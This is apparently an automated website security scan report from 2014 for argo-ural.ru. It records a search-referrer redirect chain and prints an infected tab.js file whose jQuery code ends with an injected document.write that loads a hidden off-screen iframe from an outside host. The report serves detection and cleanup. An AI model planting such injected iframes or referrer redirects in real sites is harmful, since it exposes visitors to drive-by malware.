Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://argo-ural.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: argo-ural.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Sep 2014 17:48:33 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: Jino.ru/mod_pizza Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: _cutt_caches_images=1410889713; expires=Wed, 17-Sep-2014 17:48:33 GMT; path=/ Set-Cookie: PHPSESSID=2b27f4cdb14cdf325def7fc87f363823; path=/ Set-Cookie: language=ru; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru Set-Cookie: currency=RUB; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Tue, 16 Sep 2014 17:48:33 GMT Pragma: no-cache Location: http://rosmetsar.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Tue, 16 Sep 2014 17:48:33 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://argo-ural.ru/ | 200 OK Content-Length: 41285 Content-Type: text/html | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 200 OK Content-Length: 57422 Content-Type: application/javascript | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/thickbox/thickbox-compressed.js | 200 OK Content-Length: 5710 Content-Type: application/javascript | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/tab.js | 200 OK Content-Length: 713 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $.tabs = function(selector, start) { $(selector).each(function(i, element) { $($(element).attr('tab')).css('display', 'none'); $(element).click(function() { $(selector).each(function(i, element) { $(element).removeClass('selected'); $($(element).attr('tab')).css('display', 'none'); }); $(this).addClass('selected'); $($(this).attr('tab')).css('display', 'block'); }); }); if (!start) { start = $(selector + ':first').attr('tab'); } $(selector + '[tab=\'' + start + '\']').trigger('click'); };;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://biigoo.qhigh.com/036f32a8.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>'); Antivirus reports:
| ||
http://argo-ural.ru/catalog/view/javascript/jquery/jquery.cycle.all.min.js | 200 OK Content-Length: 31200 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options, Antivirus reports:
| ||
http://argo-ural.ru/index.php?route=common/home | 200 OK Content-Length: 41285 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18296 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18358 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18420 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18482 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18544 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18606 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18668 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18730 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18792 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=argo-ural.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://argo-ural.ru/
Result: argo-ural.ru is not infected or malware details are not published yet.
Result: argo-ural.ru is not infected or malware details are not published yet.